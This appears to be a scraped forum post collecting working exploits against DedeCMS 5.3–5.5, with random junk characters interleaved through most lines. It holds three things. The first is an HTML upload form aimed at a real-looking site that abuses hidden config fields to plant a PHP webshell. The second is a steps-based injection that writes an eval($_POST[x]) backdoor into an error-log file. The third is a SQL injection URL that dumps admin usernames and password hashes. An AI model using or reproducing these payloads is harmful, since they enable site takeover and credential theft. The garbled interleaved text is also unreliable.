<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* A" R- K! s4 {
</head>
4 M9 }+ W9 g9 t8 l" ^! `- L<body style="FONT-SIZE: 9pt">( D& m( M; q- C5 B; A" j* ]; [/ R
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
0 d6 S+ H ~% O# t! G- I<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
, A# E S5 C }<input type='hidden' name='activepath' value='/data/cache/' />( z' m% x; b6 U @7 Y z$ ] l/ `
<input type='hidden' name='cfg_basedir' value='../../' />
* T# b! j _& [! Q+ A<input type='hidden' name='cfg_imgtype' value='php' />
- U7 p$ w& S1 o* e! n3 B* u# |2 i<input type='hidden' name='cfg_not_allowall' value='txt' />* x6 i, @' @6 J6 {
<input type='hidden' name='cfg_softtype' value='php' />
; Y& n2 c# F% b2 \3 M<input type='hidden' name='cfg_mediatype' value='php' />* Q: F3 B1 f) e( x8 P9 D' d
<input type='hidden' name='f' value='form1.enclosure' />
* M% h, e- T5 M<input type='hidden' name='job' value='upload' />7 L# f+ t! t+ o3 S! S1 N& m6 A
<input type='hidden' name='newname' value='fly.php' />
* ~( k/ J! V2 l" \- c6 iSelect U Shell <input type='file' name='uploadfile' size='25' />
) a, m, {5 H# x L3 u; F2 W<input type='submit' name='sb1' value='确定' />$ |, M2 W z+ u4 H
</form>' C/ n J) G. R; u' n
<br />It's just a exp for the bug of Dedecms V55...<br />5 p H0 C. n' }) b
Need register_globals = on...<br />
! ]# d+ a- W: t) ^+ D1 A3 j: H5 t% gFun the game,get a webshell at /data/cache/fly.php...<br />/ B8 R( ] m* Q1 r5 H7 q t
</body>
* a$ D6 `/ P; a/ r</html>
& h3 U0 y7 `# O( l( S4 R/ G R4 i. `/ ?- ~* t) s$ B0 _0 z
6 V3 K r$ {8 S) |$ @1 x. ]
1 [* G' y' b0 ]8 Q. q. o: i
6 r# s) c& N# `8 D$ r& N
& f& e! p/ n; I3 z* i9 j/ s, o5 N* Z9 G. A
Y0 H( ?9 Y* a) H6 U& a* {& n4 \7 q+ t" p
$ q' @) d7 U- L
+ L; |- G0 }# N' X织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞/ w' s' |2 O) X N8 r' d* g4 v; T# {+ V
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
3 q* t# K5 M( U( A+ _1. 访问网址:6 h, s. i/ I. G
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% ^; b) b+ ^8 A& D0 j, r可看见错误信息# x0 Q( S" \/ G/ _4 V
; Z. I; w# v) g& `+ }* a6 B
6 h$ R- r& s, W) {/ ?( K( Y2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
' m1 n5 z7 n. L+ Z( Iint(3) Error: Illegal double '1024e1024' value found during parsing
) I( S/ R( ~9 f1 X# W6 d2 U$ GError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
& f# q; q/ I! Y" N3 ?
# n! I/ ~0 J3 _; Z- L S- b3 T' ?/ Z1 s
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是% z9 A' H' O9 T. ?- }. A
* N) ~1 @+ e/ `; f9 Y8 }" m
% E" B- }+ M, h. O
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>1 S e3 V6 x" r1 y" m% ~! G/ e
5 L( S+ K6 C. F, w
0 i( D8 f* r6 I! Q1 [按确定后的看到第2步骤的信息表示文件木马上传成功.7 E+ x( Z1 A' w! J3 _
$ F7 [8 d) g, S% Q5 D% Z
' ^# l7 i+ |! T: J! ]+ ~8 G
3 T! t/ B% U ]! O" b+ d# K5 p( s- _0 h0 l2 O% r, K$ F, o4 A# m8 Y
- L7 W8 f2 O. i* v# j7 V8 n! |% }7 b7 [2 J. f4 y
3 O. X& I- F- K0 z2 A0 v2 `1 X+ Z' l4 C5 W, r
: T! v) v, n5 k3 U! Z2 k- }6 J7 }: Y0 Q% L: ^& Y$ ^& K
4 S) C* V: c+ j
6 W3 D/ o" c6 z1 m7 _
织梦(DedeCms)plus/infosearch.php 文件注入漏洞8 X4 f* D0 p5 L% f3 s: V
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|